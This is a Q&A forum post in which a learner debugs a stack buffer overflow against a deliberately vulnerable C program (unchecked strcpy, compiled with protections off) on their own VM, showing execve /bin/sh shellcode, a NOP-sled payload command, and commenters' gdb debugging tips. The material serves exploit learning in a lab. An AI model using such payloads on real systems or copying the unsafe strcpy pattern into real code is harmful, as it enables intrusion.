# Shell does not execute after buffer overflow

Tags: buffer-overflow, c, shellcode

I am trying to do a buffer overflow on 64-bit Kali VM. When I execute the program and inject the NOP sled + shellcode + return address, the shell does not execute. I think it might have something to do with the return address, but i'm not completely sure...

This is the program

```
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
        char buffer[256];
        strcpy(buffer, argv[1]);

        printf("%s\n");

        return 0;
}
```

Compiled wtih

```
gcc strcpy.c -o strcpy -fno-stack-protector -no-pie -z norelro -z execstack
```

Shellcode:

```
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43
\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
```

The input is 270 bytes = 216 * '\x90' + 46 bytes shellcode + 8 bytes of return address

And this is the complete command

```
r $(python -c "print('\x90' * 216 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x80\xdd\xff\xff\xff\x7f\x00\x00')")
```

Info from gdb

[image: disas main]

[image: x/250xb $rs]

[image: info registers]

As mentioned before, I have suspicion that the return address points to the wrong place but im not sure how to fix that.

Any help would be appreciated :)

Comment: Did you turn off ASLR on the target?

Comment: @schroeder Yes, i did

Comment: After the "leave" instruction is executed (just before "ret" is executed), does rsp point to the address 0x00007fffffffdd80?

Comment: If you put a break point just at the leave instruction (b *main+78) and look at the bytes near $rbp (x/4x $rbp) you should see the end of your shell code and then the return address you want. Then if you use "si" to step through the leave command you should then see $rsp pointing to the return address you want. "si" again and you should be in your shell code nop sled.

Comment: Double check your shell code. I tried to disassemble it for x86-64 with objdump and it doesn't look right to me...